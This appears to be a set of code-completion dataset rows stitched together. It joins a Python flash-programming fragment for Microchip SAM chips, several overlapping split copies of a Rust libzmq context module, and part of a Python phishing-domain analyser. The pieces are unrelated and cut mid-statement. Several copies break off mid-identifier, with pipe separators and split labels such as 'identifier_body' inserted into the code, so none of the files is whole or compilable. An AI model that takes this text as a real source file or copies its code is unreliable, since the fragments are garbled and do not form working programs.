while(n < 2):
org_inst += data_buffer[bp_addr+n] << (n*8)
data_buffer[bp_addr+n] = ((instruction >> (n*8)) & 0xff)
n = n+1
if single_page_access:
if "RH71" in device:
# Remove flash offset, if any, and mask away page internal address bits.
# FARG bitfield in EFC_FCR
page_number = addr & 0x3fff00 # SAMRH71 has page_size 256
# Erase and write page (two separate commands on SAMRH71)
dev.Write32(efc_fcr, efc_cmd_ep | page_number)
waitForFlashReady()
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
else:
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Then shift right once to position page_number in the FARG bitfield in EFC_FCR
page_number = (addr & 0x3ffe00)/2 # Canopus has page_size 512
# Erase and write page (one single command on Canopus)
dev.Write32(efc_fcr, efc_cmd_ewp | page_number)
waitForFlashReady()
else:
# Erase 16 pages (16pages == buffer_size). The "0x200" sets the number of pages to erase.
dev.Write32(efc_fcr, efc_cmd_epa | (start_addr >> 1) | 0x200)
waitForFlashReady()
prog_write("Pgm", absolute_start_addr, buffer_size, data_buffer)
return org_inst
def reset_target():#mplab
reset_and_halt()
def is_target_running():#mplab
global g_is_running
dhcsr = dev.Read32(arm.DHCSR)
state = 0 == (dhcsr & 0x20000) # S_HALT
if state != g_is_running:
log.info("Debug: Changed running state to %s" % state)
g_is_running = state
return g_is_running
def end_debug_session():#mplab | random_line_split |
||
ctx.rs | !(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
/// Applies a `CtxBuilder` to an existing `Ctx`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let global = Ctx::global();
///
/// CtxBuilder::new()
/// .io_threads(0)
/// .max_msg_size(420)
/// .max_sockets(69)
/// .no_linger()
/// .apply(global)?;
///
/// assert_eq!(global.io_threads(), 0);
/// assert_eq!(global.max_msg_size(), 420);
/// assert_eq!(global.no_linger(), true);
/// assert_eq!(global.max_sockets(), 69);
/// #
/// # Ok(())
/// # }
/// ```
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
self.inner.apply(ctx)
}
/// See [`set_io_threads`].
///
/// [`set_io_threads`]: struct.Ctx.html#method.set_io_threads
pub fn io_threads(&mut self, value: i32) -> &mut Self {
self.inner.set_io_threads(Some(value));
self
}
/// See [`set_max_msg_size`].
///
/// [`set_max_msg_size`]: struct.Ctx.html#method.set_max_msg_size
pub fn max_msg_size(&mut self, value: i32) -> &mut Self {
self.inner.set_max_msg_size(Some(value));
self
}
/// See [`set_max_sockets`].
///
/// [`set_max_sockets`]: struct.Ctx.html#method.set_max_sockets
pub fn max_sockets(&mut self, value: i32) -> &mut Self {
self.inner.set_max_sockets(Some(value));
self
}
/// See [`set_no_linger`].
///
/// [`set_no_linger`]: struct.Ctx.html#method.set_no_linger
pub fn no_linger(&mut self) -> &mut Self {
self.inner.set_no_linger(Some(true));
self
}
}
/// Keeps the list of sockets and manages the async I/O thread and
/// internal queries.
///
/// Each context also has an associated `AuthServer` which handles socket
/// authentification.
///
/// # Drop
/// The context will call terminate when dropped which will cause all
/// blocking calls to fail with `CtxTerminated`, then block until
/// the following conditions are met:
/// * All sockets open within context have been dropped.
/// * All messages sent by the application with have either been physically
/// transferred to a network peer, or the socket's linger period has expired.
///
/// # Thread safety
/// A ØMQ context is internally thread safe.
///
/// # Multiple Contexts
/// Multiple contexts are allowed but are considered exotic.
#[derive(Clone, Eq, PartialEq, Debug)]
pub struct Ctx {
raw: Arc<RawCtx>,
}
impl Ctx {
/// Create a new ØMQ context.
///
/// For almost all use cases, using and configuring the [`global`] context
/// will be enought.
///
/// See [`zmq_ctx_new`].
///
/// [`zmq_ctx_new`]: http://api.zeromq.org/master:zmq-ctx-new
///
/// # Usage Example
/// ```
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// let cloned = ctx.clone();
///
/// assert_eq!(ctx, cloned);
/// assert_ne!(ctx, Ctx::new());
/// ```
///
/// [`global`]: #method.global
pub fn new() -> Self {
let raw = Arc::new(RawCtx::default());
// Enable ipv6 by default.
raw.set_bool(RawCtxOption::IPV6, true).unwrap();
let ctx = Self { raw };
// Start a `ZAP` handler for the context.
let mut auth = AuthServer::with_ctx(&ctx).unwrap();
// This thread is guaranteed to terminate before the ctx
// since it holds a `Arc` to it. No need to store & join the
// thread handle.
thread::spawn(move || auth.run());
ctx
}
/// Returns a reference to the global context.
///
/// This is a singleton used by sockets created via their respective
/// `::new()` method. It merely exists for convenience and is no different
/// from a context obtained via `Ctx::new()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::{Ctx, Client};
///
/// // A socket created via `new` will use the global `Ctx`.
/// let client = Client::new()?;
/// assert_eq!(client.ctx(), Ctx::global());
/// #
/// # Ok(())
/// # }
/// ```
pub fn global() -> &'static Ctx {
&GLOBAL_CONTEXT
}
/// Returns the size of the ØMQ thread pool for this context.
pub fn io_threads(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::IOThreads)
}
/// Set the size of the ØMQ thread pool to handle I/O operations.
///
/// "The general rule of thumb is to allow one I/O thread per gigabyte of
/// data in or out per second." - [`Pieter Hintjens`]
///
/// [`Pieter Hintjens`]: http://zguide.zeromq.org/page:all#I-O-Threads
///
/// # Default
/// The default value is `1`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.io_threads(), 1);
///
/// // Lets say our app exclusively uses the inproc transport
/// // for messaging. Then we dont need any I/O threads.
/// ctx.set_io_threads(0)?;
/// assert_eq!(ctx.io_threads(), 0);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_io_threads(&self, nb_threads: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::IOThreads, nb_threads)
}
/// Returns the maximum number of sockets allowed for this context.
pub fn max_sockets(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxSockets)
}
/// Sets the maximum number of sockets allowed on the context.
///
/// # Default
/// The default value is `1023`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_sockets(), 1023);
///
/// ctx.set_max_sockets(420)?;
/// assert_eq!(ctx.max_sockets(), 420);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_sockets(&self, max: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxSockets, max)
}
/// Returns the maximum size of a message allowed for this context.
pub fn max_msg_size(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxMsgSize)
}
/// Sets the maximum allowed size of a message sent in the context.
///
/// # Default
/// The default value is `i32::max_value()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_msg_size(), i32::max_value());
///
/// ctx.set_max_msg_size(i32::max_value() - 1)?;
/// assert_eq!(ctx.max_msg_size(), i32::max_value() - 1);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_msg_size(&self, size: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxMsgSize, size)
}
/// Returns the largest number of sockets that the context will accept.
pub fn socket_limit(&self) -> i32 {
| self.raw.as_ref().get(RawCtxOption::SocketLimit)
}
| identifier_body |
|
ctx.rs | == 0 {
break;
} else {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINTR => (),
_ => unreachable!(),
}
}
}
}
fn shutdown(&self) {
let rc = unsafe { sys::zmq_ctx_shutdown(self.ctx) };
// Should never fail.
assert_eq!(rc, 0);
}
}
// The `zmq_ctx` is internally threadsafe.
unsafe impl Send for RawCtx {}
unsafe impl Sync for RawCtx {}
impl Drop for RawCtx {
fn drop(&mut self) {
self.terminate()
}
}
impl PartialEq for RawCtx {
/// Compares the two underlying raw C pointers.
fn eq(&self, other: &Self) -> bool {
ptr::eq(self.ctx, other.ctx)
}
}
impl Eq for RawCtx {}
impl Default for RawCtx {
fn default() -> Self {
let ctx = unsafe { sys::zmq_ctx_new() };
if ctx.is_null() { |
Self { ctx }
}
}
/// A config for a [`Ctx`].
///
/// Usefull in configuration files.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxConfig {
io_threads: Option<i32>,
max_msg_size: Option<i32>,
max_sockets: Option<i32>,
no_linger: Option<bool>,
}
impl CtxConfig {
pub fn new() -> Self {
Self::default()
}
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
if let Some(value) = self.io_threads {
ctx.set_io_threads(value)?;
}
if let Some(value) = self.max_sockets {
ctx.set_max_sockets(value)?;
}
if let Some(value) = self.max_msg_size {
ctx.set_max_msg_size(value)?;
}
if let Some(value) = self.no_linger {
ctx.set_no_linger(value)?;
}
Ok(())
}
pub fn io_threads(&self) -> Option<i32> {
self.io_threads
}
pub fn set_io_threads(&mut self, value: Option<i32>) {
self.io_threads = value;
}
pub fn max_msg_size(&self) -> Option<i32> {
self.max_msg_size
}
pub fn set_max_msg_size(&mut self, value: Option<i32>) {
self.max_msg_size = value;
}
pub fn max_sockets(&mut self) -> Option<i32> {
self.max_sockets
}
pub fn set_max_sockets(&mut self, value: Option<i32>) {
self.max_sockets = value;
}
pub fn no_linger(&self) -> Option<bool> {
self.no_linger
}
pub fn set_no_linger(&mut self, value: Option<bool>) {
self.no_linger = value;
}
}
/// A convenience builder for a [`Ctx`].
///
/// Makes complex context configuration more convenient.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxBuilder {
inner: CtxConfig,
}
impl CtxBuilder {
pub fn new() -> Self {
Self::default()
}
/// Builds a `Ctx` from a `CtxBuilder`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let ctx = CtxBuilder::new()
/// .io_threads(2)
/// .no_linger()
/// .build()?;
///
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
/// Applies a `CtxBuilder` to an existing `Ctx`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let global = Ctx::global();
///
/// CtxBuilder::new()
/// .io_threads(0)
/// .max_msg_size(420)
/// .max_sockets(69)
/// .no_linger()
/// .apply(global)?;
///
/// assert_eq!(global.io_threads(), 0);
/// assert_eq!(global.max_msg_size(), 420);
/// assert_eq!(global.no_linger(), true);
/// assert_eq!(global.max_sockets(), 69);
/// #
/// # Ok(())
/// # }
/// ```
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
self.inner.apply(ctx)
}
/// See [`set_io_threads`].
///
/// [`set_io_threads`]: struct.Ctx.html#method.set_io_threads
pub fn io_threads(&mut self, value: i32) -> &mut Self {
self.inner.set_io_threads(Some(value));
self
}
/// See [`set_max_msg_size`].
///
/// [`set_max_msg_size`]: struct.Ctx.html#method.set_max_msg_size
pub fn max_msg_size(&mut self, value: i32) -> &mut Self {
self.inner.set_max_msg_size(Some(value));
self
}
/// See [`set_max_sockets`].
///
/// [`set_max_sockets`]: struct.Ctx.html#method.set_max_sockets
pub fn max_sockets(&mut self, value: i32) -> &mut Self {
self.inner.set_max_sockets(Some(value));
self
}
/// See [`set_no_linger`].
///
/// [`set_no_linger`]: struct.Ctx.html#method.set_no_linger
pub fn no_linger(&mut self) -> &mut Self {
self.inner.set_no_linger(Some(true));
self
}
}
/// Keeps the list of sockets and manages the async I/O thread and
/// internal queries.
///
/// Each context also has an associated `AuthServer` which handles socket
/// authentification.
///
/// # Drop
/// The context will call terminate when dropped which will cause all
/// blocking calls to fail with `CtxTerminated`, then block until
/// the following conditions are met:
/// * All sockets open within context have been dropped.
/// * All messages sent by the application with have either been physically
/// transferred to a network peer, or the socket's linger period has expired.
///
/// # Thread safety
/// A ØMQ context is internally thread safe.
///
/// # Multiple Contexts
/// Multiple contexts are allowed but are considered exotic.
#[derive(Clone, Eq, PartialEq, Debug)]
pub struct Ctx {
raw: Arc<RawCtx>,
}
impl Ctx {
/// Create a new ØMQ context.
///
/// For almost all use cases, using and configuring the [`global`] context
/// will be enought.
///
/// See [`zmq_ctx_new`].
///
/// [`zmq_ctx_new`]: http://api.zeromq.org/master:zmq-ctx-new
///
/// # Usage Example
/// ```
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// let cloned = ctx.clone();
///
/// assert_eq!(ctx, cloned);
/// assert_ne!(ctx, Ctx::new());
/// ```
///
/// [`global`]: #method.global
pub fn new() -> Self {
let raw = Arc::new(RawCtx::default());
// Enable ipv6 by default.
raw.set_bool(RawCtxOption::IPV6, true).unwrap();
let ctx = Self { raw };
// Start a `ZAP` handler for the context.
let mut auth = AuthServer::with_ctx(&ctx).unwrap();
// This thread is guaranteed to terminate before the ctx
// since it holds a `Arc` to it. No need to store & join the
// thread handle.
thread::spawn(move || auth.run());
ctx
}
/// Returns a reference to the global context.
///
/// This is a singleton used by sockets created via their respective
/// `::new()` method. It merely exists for convenience and is no different
/// from a context obtained via `Ctx::new()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::{Ctx, Client};
///
/// // A socket created via `new` will use the global `Ctx`.
/// let client = Client::new()?;
/// assert_eq!(client.ctx(), Ctx:: |
panic!(msg_from_errno(unsafe { sys::zmq_errno() }));
}
| conditional_block |
ctx.rs | IOThreads,
MaxSockets,
MaxMsgSize,
SocketLimit,
IPV6,
Blocky,
}
impl From<RawCtxOption> for c_int {
fn from(r: RawCtxOption) -> c_int {
match r {
RawCtxOption::IOThreads => sys::ZMQ_IO_THREADS as c_int,
RawCtxOption::MaxSockets => sys::ZMQ_MAX_SOCKETS as c_int,
RawCtxOption::MaxMsgSize => sys::ZMQ_MAX_MSGSZ as c_int,
RawCtxOption::SocketLimit => sys::ZMQ_SOCKET_LIMIT as c_int,
RawCtxOption::IPV6 => sys::ZMQ_IPV6 as c_int,
RawCtxOption::Blocky => sys::ZMQ_BLOCKY as c_int,
}
}
}
#[derive(Debug)]
struct RawCtx {
ctx: *mut c_void,
}
impl RawCtx {
fn get(&self, option: RawCtxOption) -> i32 {
unsafe { sys::zmq_ctx_get(self.ctx, option.into()) }
}
fn set(&self, option: RawCtxOption, value: i32) -> Result<(), Error> {
let rc = unsafe { sys::zmq_ctx_set(self.ctx, option.into(), value) };
if rc == -1 {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINVAL => Err(Error::new(ErrorKind::InvalidInput {
msg: "invalid value",
})),
_ => panic!(msg_from_errno(errno)),
}
} else {
Ok(())
}
}
fn set_bool(&self, opt: RawCtxOption, flag: bool) -> Result<(), Error> {
self.set(opt, flag as i32)
}
fn get_bool(&self, opt: RawCtxOption) -> bool {
let flag = self.get(opt);
flag != 0
}
fn terminate(&self) {
// We loop in case `zmq_ctx_term` get interrupted by a signal.
loop {
let rc = unsafe { sys::zmq_ctx_term(self.ctx) };
if rc == 0 {
break;
} else {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINTR => (),
_ => unreachable!(),
}
}
}
}
fn shutdown(&self) {
let rc = unsafe { sys::zmq_ctx_shutdown(self.ctx) };
// Should never fail.
assert_eq!(rc, 0);
}
}
// The `zmq_ctx` is internally threadsafe.
unsafe impl Send for RawCtx {}
unsafe impl Sync for RawCtx {}
impl Drop for RawCtx {
fn drop(&mut self) {
self.terminate()
}
}
impl PartialEq for RawCtx {
/// Compares the two underlying raw C pointers.
fn eq(&self, other: &Self) -> bool {
ptr::eq(self.ctx, other.ctx)
}
}
impl Eq for RawCtx {}
impl Default for RawCtx {
fn default() -> Self {
let ctx = unsafe { sys::zmq_ctx_new() };
if ctx.is_null() {
panic!(msg_from_errno(unsafe { sys::zmq_errno() }));
}
Self { ctx }
}
}
/// A config for a [`Ctx`].
///
/// Usefull in configuration files.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxConfig {
io_threads: Option<i32>,
max_msg_size: Option<i32>,
max_sockets: Option<i32>,
no_linger: Option<bool>,
}
impl CtxConfig {
pub fn new() -> Self {
Self::default()
}
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
if let Some(value) = self.io_threads {
ctx.set_io_threads(value)?;
}
if let Some(value) = self.max_sockets {
ctx.set_max_sockets(value)?;
}
if let Some(value) = self.max_msg_size {
ctx.set_max_msg_size(value)?;
}
if let Some(value) = self.no_linger {
ctx.set_no_linger(value)?;
}
Ok(())
}
pub fn io_threads(&self) -> Option<i32> {
self.io_threads
}
pub fn set_io_threads(&mut self, value: Option<i32>) {
self.io_threads = value;
}
pub fn max_msg_size(&self) -> Option<i32> {
self.max_msg_size
}
pub fn set_max_msg_size(&mut self, value: Option<i32>) {
self.max_msg_size = value;
}
pub fn max_sockets(&mut self) -> Option<i32> {
self.max_sockets
}
pub fn set_max_sockets(&mut self, value: Option<i32>) {
self.max_sockets = value;
}
pub fn no_linger(&self) -> Option<bool> {
self.no_linger
}
pub fn set_no_linger(&mut self, value: Option<bool>) {
self.no_linger = value;
}
}
/// A convenience builder for a [`Ctx`].
///
/// Makes complex context configuration more convenient.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxBuilder {
inner: CtxConfig,
}
impl CtxBuilder {
pub fn new() -> Self {
Self::default()
}
/// Builds a `Ctx` from a `CtxBuilder`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let ctx = CtxBuilder::new()
/// .io_threads(2)
/// .no_linger()
/// .build()?;
///
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
/// Applies a `CtxBuilder` to an existing `Ctx`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let global = Ctx::global();
///
/// CtxBuilder::new()
/// .io_threads(0)
/// .max_msg_size(420)
/// .max_sockets(69)
/// .no_linger()
/// .apply(global)?;
///
/// assert_eq!(global.io_threads(), 0);
/// assert_eq!(global.max_msg_size(), 420);
/// assert_eq!(global.no_linger(), true);
/// assert_eq!(global.max_sockets(), 69);
/// #
/// # Ok(())
/// # }
/// ```
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
self.inner.apply(ctx)
}
/// See [`set_io_threads`].
///
/// [`set_io_threads`]: struct.Ctx.html#method.set_io_threads
pub fn io_threads(&mut self, value: i32) -> &mut Self {
self.inner.set_io_threads(Some(value));
self
}
/// See [`set_max_msg_size`].
///
/// [`set_max_msg_size`]: struct.Ctx.html#method.set_max_msg_size
pub fn max_msg_size(&mut self, value: i32) -> &mut Self {
self.inner.set_max_msg_size(Some(value));
self
}
/// See [`set_max_sockets`].
///
/// [`set_max_sockets`]: struct.Ctx.html#method.set_max_sockets
pub fn max_sockets(&mut self, value: i32) -> &mut Self {
self.inner.set_max_sockets(Some(value));
self
}
/// See [`set_no_linger`].
///
/// [`set_no_linger`]: struct.Ctx.html#method.set_no_linger
pub fn no_linger(&mut self) -> &mut Self {
self.inner.set_no_linger(Some(true));
self
}
}
/// Keeps the list of sockets and manages the async I/O thread and
/// internal queries.
///
/// Each context also has an associated `AuthServer` which handles socket
/// authentification.
///
/// # Drop
/// The context will call terminate when dropped which will cause all
/// blocking calls to fail with `CtxTerminated`, then block until
/// the following conditions are met:
/// * All sockets open within context have been dropped.
/// * All messages sent by the application with have either been physically
/// transferred to a network peer, or the socket's linger period has expired.
///
/// # Thread safety
/// A ØMQ context is internally thread | }
#[derive(Copy, Clone, Debug)]
enum RawCtxOption { | random_line_split |
|
ctx.rs | == 0 {
break;
} else {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINTR => (),
_ => unreachable!(),
}
}
}
}
fn shutdown(&self) {
let rc = unsafe { sys::zmq_ctx_shutdown(self.ctx) };
// Should never fail.
assert_eq!(rc, 0);
}
}
// The `zmq_ctx` is internally threadsafe.
unsafe impl Send for RawCtx {}
unsafe impl Sync for RawCtx {}
impl Drop for RawCtx {
fn drop(&mut self) {
self.terminate()
}
}
impl PartialEq for RawCtx {
/// Compares the two underlying raw C pointers.
fn eq(&self, other: &Self) -> bool {
ptr::eq(self.ctx, other.ctx)
}
}
impl Eq for RawCtx {}
impl Default for RawCtx {
fn default() -> Self {
let ctx = unsafe { sys::zmq_ctx_new() };
if ctx.is_null() {
panic!(msg_from_errno(unsafe { sys::zmq_errno() }));
}
Self { ctx }
}
}
/// A config for a [`Ctx`].
///
/// Usefull in configuration files.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxConfig {
io_threads: Option<i32>,
max_msg_size: Option<i32>,
max_sockets: Option<i32>,
no_linger: Option<bool>,
}
impl CtxConfig {
pub fn new() -> Self {
Self::default()
}
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
if let Some(value) = self.io_threads {
ctx.set_io_threads(value)?;
}
if let Some(value) = self.max_sockets {
ctx.set_max_sockets(value)?;
}
if let Some(value) = self.max_msg_size {
ctx.set_max_msg_size(value)?;
}
if let Some(value) = self.no_linger {
ctx.set_no_linger(value)?;
}
Ok(())
}
pub fn io_threads(&self) -> Option<i32> {
self.io_threads
}
pub fn set_io_threads(&mut self, value: Option<i32>) {
self.io_threads = value;
}
pub fn max_msg_size(&self) -> Option<i32> {
self.max_msg_size
}
pub fn set_max_msg_size(&mut self, value: Option<i32>) {
self.max_msg_size = value;
}
pub fn max_sockets(&mut self) -> Option<i32> {
self.max_sockets
}
pub fn set_max_sockets(&mut self, value: Option<i32>) {
self.max_sockets = value;
}
pub fn no_linger(&self) -> Option<bool> {
self.no_linger
}
pub fn set_no_linger(&mut self, value: Option<bool>) {
self.no_linger = value;
}
}
/// A convenience builder for a [`Ctx`].
///
/// Makes complex context configuration more convenient.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxBuilder {
inner: CtxConfig,
}
impl CtxBuilder {
pub fn new() -> Self {
Self::default()
}
/// Builds a `Ctx` from a `CtxBuilder`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let ctx = CtxBuilder::new()
/// .io_threads(2)
/// .no_linger()
/// .build()?;
///
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
/// Applies a `CtxBuilder` to an existing `Ctx`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let global = Ctx::global();
///
/// CtxBuilder::new()
/// .io_threads(0)
/// .max_msg_size(420)
/// .max_sockets(69)
/// .no_linger()
/// .apply(global)?;
///
/// assert_eq!(global.io_threads(), 0);
/// assert_eq!(global.max_msg_size(), 420);
/// assert_eq!(global.no_linger(), true);
/// assert_eq!(global.max_sockets(), 69);
/// #
/// # Ok(())
/// # }
/// ```
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
self.inner.apply(ctx)
}
/// See [`set_io_threads`].
///
/// [`set_io_threads`]: struct.Ctx.html#method.set_io_threads
pub fn i | &mut self, value: i32) -> &mut Self {
self.inner.set_io_threads(Some(value));
self
}
/// See [`set_max_msg_size`].
///
/// [`set_max_msg_size`]: struct.Ctx.html#method.set_max_msg_size
pub fn max_msg_size(&mut self, value: i32) -> &mut Self {
self.inner.set_max_msg_size(Some(value));
self
}
/// See [`set_max_sockets`].
///
/// [`set_max_sockets`]: struct.Ctx.html#method.set_max_sockets
pub fn max_sockets(&mut self, value: i32) -> &mut Self {
self.inner.set_max_sockets(Some(value));
self
}
/// See [`set_no_linger`].
///
/// [`set_no_linger`]: struct.Ctx.html#method.set_no_linger
pub fn no_linger(&mut self) -> &mut Self {
self.inner.set_no_linger(Some(true));
self
}
}
/// Keeps the list of sockets and manages the async I/O thread and
/// internal queries.
///
/// Each context also has an associated `AuthServer` which handles socket
/// authentification.
///
/// # Drop
/// The context will call terminate when dropped which will cause all
/// blocking calls to fail with `CtxTerminated`, then block until
/// the following conditions are met:
/// * All sockets open within context have been dropped.
/// * All messages sent by the application with have either been physically
/// transferred to a network peer, or the socket's linger period has expired.
///
/// # Thread safety
/// A ØMQ context is internally thread safe.
///
/// # Multiple Contexts
/// Multiple contexts are allowed but are considered exotic.
#[derive(Clone, Eq, PartialEq, Debug)]
pub struct Ctx {
raw: Arc<RawCtx>,
}
impl Ctx {
/// Create a new ØMQ context.
///
/// For almost all use cases, using and configuring the [`global`] context
/// will be enought.
///
/// See [`zmq_ctx_new`].
///
/// [`zmq_ctx_new`]: http://api.zeromq.org/master:zmq-ctx-new
///
/// # Usage Example
/// ```
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// let cloned = ctx.clone();
///
/// assert_eq!(ctx, cloned);
/// assert_ne!(ctx, Ctx::new());
/// ```
///
/// [`global`]: #method.global
pub fn new() -> Self {
let raw = Arc::new(RawCtx::default());
// Enable ipv6 by default.
raw.set_bool(RawCtxOption::IPV6, true).unwrap();
let ctx = Self { raw };
// Start a `ZAP` handler for the context.
let mut auth = AuthServer::with_ctx(&ctx).unwrap();
// This thread is guaranteed to terminate before the ctx
// since it holds a `Arc` to it. No need to store & join the
// thread handle.
thread::spawn(move || auth.run());
ctx
}
/// Returns a reference to the global context.
///
/// This is a singleton used by sockets created via their respective
/// `::new()` method. It merely exists for convenience and is no different
/// from a context obtained via `Ctx::new()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::{Ctx, Client};
///
/// // A socket created via `new` will use the global `Ctx`.
/// let client = Client::new()?;
/// assert_eq!(client.ctx(), Ctx:: | o_threads( | identifier_name |
common_domain_analyser.py | domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# Remove some FP-prone parts
domain = re.sub(AhoCorasickDomainMatching.IGNORED_PARTS, '', domain)
# Similar to all domains in the list, the TLD will be stripped off
ext = tldextract.extract(domain)
# The match will be a tuple in the following format: (5, (0, 'google'))
matches = [m[1][1] for m in self.automaton.iter('.'.join(ext[:2]))
if len(m[1][1]) >= AhoCorasickDomainMatching.MIN_MATCHING_LENGTH]
if matches:
matches.sort(key=len)
match = matches[-1]
# We only keep the the longest match of the first matching domain
# for now
results[domain] = [self.domains[match]] if match in self.domains else match
break
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
class WordSegmentation(Analyser):
'''
Perform word segmentation of all the SAN domains as an attempt to make sense
of their names. For example, both arch.mappleonline.com and apple-verifyupdate.serveftp.com
domains have 'apple' inside but only the second one is an actual Apple phishing
page. Intuitively, a good word segmentation algorithm will return:
- arch + mapple + online + com
- apple + verify + update + serve + ftp + com
Thus, it's much easier to spot the second phishing domain.
Implementation-wise, there are several existing packages around to do this, for
example:
- https://github.com/grantjenks/python-wordsegment
- https://github.com/keredson/wordninja
Let's see what they can do, take it away!
'''
# Some common stop words that are in the list of most popular domains
STOPWORDS = {
'app': 1,
'inc': 1,
'box': 1,
'health': 1,
'home': 1,
'space': 1,
'cars': 1,
'nature': 1,
}
def __init__(self):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
def run(self, record):
'''
Apply word segment to all the SAN domain names. Let's see if it makes
any sense.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# The TLD will be stripped off cause it does not contribute anything here
ext = tldextract.extract(domain)
words = []
# We choose to segment the TLD here as well, for example, .co.uk
# will become ['co', 'uk']. Let see if this works out.
for part in ext[:]:
for token in part.split('.'):
segmented = [w for w in wordsegment.segment(token) if w not in WordSegmentation.STOPWORDS]
if segmented:
words.extend(segmented)
elif token:
# For some IDNA domain like xn--wgbfq3d.xn--ngbc5azd, the segmentation
# won't work and an empty array is returned. So we choose to just keep
# the original token
words.append(token)
results[domain] = words
if results:
|
return record
